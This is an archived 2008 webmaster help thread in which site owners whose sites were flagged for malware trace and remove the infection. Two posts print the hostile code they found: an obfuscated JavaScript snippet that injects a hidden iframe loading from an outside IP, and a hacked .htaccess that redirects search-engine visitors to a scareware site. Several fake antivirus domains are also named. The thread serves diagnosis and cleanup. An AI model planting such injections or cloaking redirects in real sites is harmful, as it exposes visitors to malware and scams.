Gmail Calendar Documents Reader Web more »
Recently Visited Groups | Help | Sign in
Google Groups Home
There are currently too many topics in this group that display first. To make this topic appear first, remove this option from another topic.
There was an error processing your request. Please try again.
flag
  13 messages - Collapse all  -  Translate all to Translated (View all originals)
The group you are posting to is a Usenet group. Messages posted to this group will make your email address visible to anyone on the Internet.
Your reply message has not been sent.
Your post was successful
 
From:
To:
Cc:
Followup To:
Add Cc | Add Followup-to | Edit Subject
Subject:
Validation:
For verification purposes please type the characters you see in the picture below or the numbers you hear by clicking the accessibility icon. Listen and type the numbers you hear
 
jbat13  
View profile  
 More options Jul 29 2008, 10:39 am
From: jbat13
Date: Tue, 29 Jul 2008 07:39:38 -0700 (PDT)
Local: Tues, Jul 29 2008 10:39 am
Subject: distributing malware
Hi
I received an email yesterday suspending our adword account due to
distributing malware. Following that I realized our google links have
the warning This site may harm your computer.
I have scoured our site files, etc. had the host do all they can and
contacted the software forum, etc and come up rather thin in what it
might be. Some images were not well secured and there was a php file
of unknown origin though the contents did not seem very suspicious.
Our host added an additional level of security to the images, etc. I
have not yet applied for a review. Can anyone here look at the page
that was pulled from adwords and see if they can find something I'm
missing? The link is:
http://www.13moons.com/index.php?main_page=index&cPath=29

Thanks for any help on this


    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
JohnMu Google employee  
View profile  
 More options Jul 30 2008, 5:27 am
From: JohnMu
Date: Wed, 30 Jul 2008 02:27:01 -0700 (PDT)
Local: Wed, Jul 30 2008 5:27 am
Subject: Re: distributing malware
Hi jbat13 and welcome to the groups!

it looks like your server is redirecting when users are coming in from
Google (and possibly other search engines). I tried the following to
access your site with a Google referrer and it redirected me:

wget -U Mozilla --referer "http://www.google.com/search?q=stuff"
http://www.13moons. com/

Resolving www.13moons. com... 208.75.151.135
Connecting to www.13moons. com|208.75.151.135|:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: http://87.248.180. 88/in.html?s=hg [following]

Connecting to 87.248.180. 88:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: http://scanner.power-antivirus-2009. com/?aff=1050
[following]

Resolving scanner.power-antivirus-2009. com... 91.208.0.233
Connecting to scanner.power-antivirus-2009. com|91.208.0.233|:80...
connected.
HTTP request sent, awaiting response... 200 OK
(...)

"wget" is a free tool that's available for most operating systems. You
will most likely want to contact your hoster to get help to resolve
this issue.

Hope it helps!

John


    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
lescan  
View profile  
 More options Jul 30 2008, 2:59 pm
From: lescan
Date: Wed, 30 Jul 2008 11:59:12 -0700 (PDT)
Local: Wed, Jul 30 2008 2:59 pm
Subject: Re: distributing malware
John,

I am having the same problem as Jbat13.
I discovered it two weeks ago when I attempted to access the site
statistics from my webhost.
At that time it was redirecting me to the same antivirus url as
Jbat13, but from the webhost stats page and the webmail page.
It was not affecting / redirecting me from any other page on my site,
accessed directly from my site or via a link from google.
My webhost discovered and cleaned up the hack two days after I
reported it.  I thought everything was cool, until yesterday when I
discovered Google has blocked the website and added a statement that
says that the site distributes Malware.
I requested a review of the site, but they are telling me that it is
still infected.  MSN, Yahoo and Altavista do not seem to have a
problem with the site and it is not redirecting me when I enter the
site directly.  In addition I combed through a few of the pages--
straight html...nothing fancy and did not find any text out of order.

Is there another way in which to further analize my files to ensure
the Malware is erradicated, so that Google can stop blocking my site?

The site is http://www.prestonparkchild.com

Thank you for your time, I appreciate any light you can shed on this.

Leslie


    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
jbat13  
View profile  
(1 user)  More options Jul 30 2008, 3:52 pm
From: jbat13
Date: Wed, 30 Jul 2008 12:52:58 -0700 (PDT)
Local: Wed, Jul 30 2008 3:52 pm
Subject: Re: distributing malware
Leslie, my problem was just discovered (not by me). It turned out to
be incredibly simple and I too had to wait 2 days for it to be
discovered. The htaccess file was hacked and a bunch of re-write code
was dumped in. My host also felt a bit foolish for not looking there
sooner! Now I have to go have it reviewed I guess. I already put a
request in a day ago because every one had done as much as possible
and security was tighted, etc. Hopefully it won't look bad to have
another request.

Maybe this will help.


    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
JohnMu Google employee  
View profile  
 More options Jul 30 2008, 5:48 pm
From: JohnMu
Date: Wed, 30 Jul 2008 14:48:54 -0700 (PDT)
Local: Wed, Jul 30 2008 5:48 pm
Subject: Re: distributing malware
Hi Leslie and welcome to the groups!

I'm currently looking at the /calendar.html page in your site and
seeing the following code right at the top:

<body onload="l='//'; gf='fr'; h='7.1'; n='3'; f='ame'; i='i'; m='c';
p='tp:'; u='2'; ze='s'; q='8'; gg='1'; c='6.'; jh='erv'; k='4';
o='0/'; b='17'; g='ht';t='/';fs='.';qs='sr'; s=i.concat(gf,f);
zj=qs.concat(m); se=g.concat(p,l,q,gg,fs,b,c,u,n,h,k,o,ze,jh,t); var
nu=document.createElement(s); nu.setAttribute('width','5');
nu.setAttribute('height','5');
nu.setAttribute('style','display:none'); nu.setAttribute(zj,se);
document.body.appendChild(nu);"></body></html>
<FONT FACE="Verdana" SIZE="2" COLOR="000000">

This code adds malware elements to your page when visitors view it
with JavaScript enabled (I would recommend not visiting it at the
moment :-)). It's possible that the rest of your site has similar code
-- I would recommend checking all of the pages (and of course fixing
those where you find similar code). Once you have done that, a malware
review will generally be positive, but I would still suggest all of
the usual security measures such as changing the passwords, etc.

Some additional information regarding situations like this can be
found in our blog post at http://googlewebmastercentral.blogspot.com/2008/04/my-sites-been-hack...

Hope it helps, good luck!

John


    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
lescan  
View profile  
 More options Jul 30 2008, 7:53 pm
From: lescan
Date: Wed, 30 Jul 2008 16:53:49 -0700 (PDT)
Local: Wed, Jul 30 2008 7:53 pm
Subject: Re: distributing malware
Many thanks John + Jbat13.  I will look for that code and let you know
how it goes.

....Leslie

On Jul 30, 4:48 pm, JohnMu wrote:


    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
lescan  
View profile  
 More options Jul 30 2008, 8:08 pm
From: lescan
Date: Wed, 30 Jul 2008 17:08:27 -0700 (PDT)
Local: Wed, Jul 30 2008 8:08 pm
Subject: Re: distributing malware
Hi ..its me again...

As I entered the site to inspect and edit my code I also looked at
the
 htaccess file and found two files one has 0 bytes and the other is
htacces[dot]mal..it has 417 bytes.
Should I delete the mal file?

...Thanks again.

Leslie


    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
webado  
View profile  
 More options Jul 30 2008, 8:31 pm
From: webado
Date: Wed, 30 Jul 2008 17:31:08 -0700 (PDT)
Local: Wed, Jul 30 2008 8:31 pm
Subject: Re: distributing malware
Only the file called .htaccess will be active. But with a size of 0
that means it's empty.

The other will be useless but if you don't know who put it there, this
is worrisome. This means there's an unauthorized  way into your site
It may have been put there to facilitate future hacking. Or maybe your
hoster found the  hacked .hatccess file and renamed it to that.

Download it and take a look. It probably has nasty directives.

Then I would delete it from the server. Keep it as future reference on
your pc.

You will have to find and plug all vulnerabilities. Probably your
hoster has to get involved seriously.

While you are at it, you shodl change thsi meta tag on yro homepage:
<meta name="verify-v1"
content="AcnW448XoqhOSUEHAe8UXOUueiTnrA6A6xZ4CMjuFbM=" />

It needs to be closed with > and not /> because you are not using an
xhtml doctype.

On Jul 30, 8:08 pm, lescan wrote:


    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
lescan  
View profile  
 More options Jul 30 2008, 9:22 pm
From: lescan
Date: Wed, 30 Jul 2008 18:22:15 -0700 (PDT)
Local: Wed, Jul 30 2008 9:22 pm
Subject: Re: distributing malware
Many Many Thanks to y'all  --John, JBat13 + webado

I've just finished going through and editing all of the files.  I have
changed the file access, deleted files that I did not put in there and
alerted my webhost.  Oh...and changed my password again!

After reading the postings at webmaster world from the link John
provided, I too am wondering if the webhost is being targeted.  They
have been having access issues, email stoppages, etc. recently.
I have not had any of these issues on the other sites that I manage--
they are on servers with other webhosts.

Thanks again and I will now resubmit to Google.

....Leslie


    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
lescan  
View profile  
(2 users)  More options Jul 31 2008, 9:14 am
From: lescan
Date: Thu, 31 Jul 2008 06:14:42 -0700 (PDT)
Local: Thurs, Jul 31 2008 9:14 am
Subject: Re: distributing malware
Yippy!

All cleaned up, indexed and Google listing is looking GREAT!

Many thanks to you all for your help.  :-)  Life is Good!

..Leslie in Abilene, Texas


    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
tjoe70s  
View profile  
 More options Aug 1 2008, 8:58 am
From: tjoe70s
Date: Fri, 1 Aug 2008 05:58:08 -0700 (PDT)
Local: Fri, Aug 1 2008 8:58 am
Subject: Re: distributing malware
Thank you all for this thread.  I've been going crazy trying to find
out why these very persistent antivirus popups were plaguing my site.
I've searched more than a hundred groups/forums/etc. looking for an
answer.

Several weeks ago, one of my visitors told me that they had gotten a
popup stating that he might be infected and to run this free scan from
"windows-virus-scanner.com".  Canceling it (close or the "x") caused
it to run anyway.  My main pages are comprised of tables and some
tables have iframes displaying live content fed from another source.
The unsolicited popup (which occurred very randomly, sometimes only a
few times a day, sometimes more) almost always ran inside the same
table on my main pages (running one of the live content html pages as
an iframe), or any launched window that ran the same page in an
iframe.  Sometimes it would run from a different table that was
running yet another live content html page as an iframe, but mostly it
was from the other table.

My site is served mainly by a (shared) web host and the live content
is served up from a different source.  I copied all of my hosted files
back locally, scanned them with every virus and spyware/adware scanner
that I already had (was NOT going to buy or install a new one) and
found nothing.  I read every line of code on every page that I wrote
(all manually created, not by a page generator) and there was nothing
out of place.

Other symptoms I was having was if someone clicked on the link to my
site from my email signature (in yahoo), or if I gave them the link
through yahoo messenger or msn, their full page would be redirected to
the windows-virus-scanner.com page.

Over time, the URL of the pages kept changing, but still leading back
to the same company that then forced the freescan.  Here are the other
URL names they used:
  antivirus2008-freescan.com
  antivirus2009-freescan.com
  windows-defense.com
  scanner.win-antivir-2008.com
  scanner.win-antivir-2009.com
  scanner.power-antivirus-2009.com

From my research, thanks mostly to this thread leading me down the
right roads, I believe it is most likely someone that is getting paid
to refer as many people as possible to that company.  I contacted the
company directly through their email support at "support@xp-
registration.com" asking how to get rid of this and their reply back
to me said to buy their software and run the scan - nice.  Earlier
this week they started getting even more aggressive - if you tried to
reload the page (which usually cleaned it because it made the correct
page run in my table), or close the page, they would popup another
warning about not navigating away from their page and all kinds of
scareware messages.  Closing it anyway made it still run their
scanner.

I was trying all kinds of ways to block this popup but nothing stopped
it.  I placed the URLs in the Restricted list for Internet Options, I
ran popup blockers, etc... The only thing that came close to helping
was to use my antivirus program (AWIL's AVAST) and their WebShield to
block these URLs.  The page would still be affected, but at least the
popup was blocked and the "free scan" couldn't run.  Avast just put a
notice in that table, where the malicious page was running, saying
that it blocked it.  My next step was to try the same thing with my
hardware firewall (I could not find this feature in windows'
firewall), but then a search of the latest URL change brought me to
this thread.

The source of the problem ended up being the .htaccess file on the
shared host.  After seeing that file name mentioned a few times in
this thread, I looked and found that a .htaccess file was placed into
every single folder that I had on the host - on about the same day as
I had my first complaint of the popup.  The file contained the
following data (after about 40 line feeds):

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://87.248.180.90/in.html?s=ipw2 [R,L]
Errordocument 404 http://87.248.180.90/in.html?s=ipw2_err

The ip address traces out to Chisinau, Moldova

By the way, a friend with a MAC had the popup run on her machine and
it totally took over her browser and she had to have someone uninstall
and reinstall it for her.

So, many thanks to all of you - each of you had a piece of the puzzle
for me.  After having my host provider run a script removing
all .htaccess files, my site is fine once again.  I might even turn my
google ads back on ;)  I was blaming the ads for this since I could
find nothing else.

Many, many thanks!
Terry
My70sRadio.com

On Jul 31, 8:14 am, lescan wrote:


    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Aaron Clint  
View profile  
 More options Aug 3 2008, 5:16 pm
From: Aaron Clint
Date: Sun, 3 Aug 2008 14:16:37 -0700 (PDT)
Local: Sun, Aug 3 2008 5:16 pm
Subject: Re: distributing malware
As a server admin this was helpful in tracking down the issue one of
my clients faced, I did a search on my server and found just one site
was affected and it was via FTP. It appeared the hacker got the FTP
account a few weeks before they actually uploaded the .htaccess files
so make sure you are changing your logins and not sending them around
via email, I've also started generating 8-12 character passwords with
4 types of complexity (alpha,numeric,symbol,case).

On Aug 1, 7:58 am, tjoe70s wrote:


    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
webado  
View profile  
 More options Aug 3 2008, 5:31 pm
From: webado
Date: Sun, 3 Aug 2008 14:31:29 -0700 (PDT)
Local: Sun, Aug 3 2008 5:31 pm
Subject: Re: distributing malware
Wow, good job!

Glad you got it fixed.

Just keep on trying to figure out how they got a hold of the user/
password combo, this is the crux.

There may be server vulnerabilities like Frontpage extensions.

Of  course it's possible the user had a trojan or a key-logger on
their pc.

On Aug 3, 5:16 pm, Aaron Clint wrote:


    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
End of messages
« Back to Discussions « Newer topic     Older topic »

Create a group - Google Groups - Google Home - Terms of Service - Privacy Policy
©2009 Google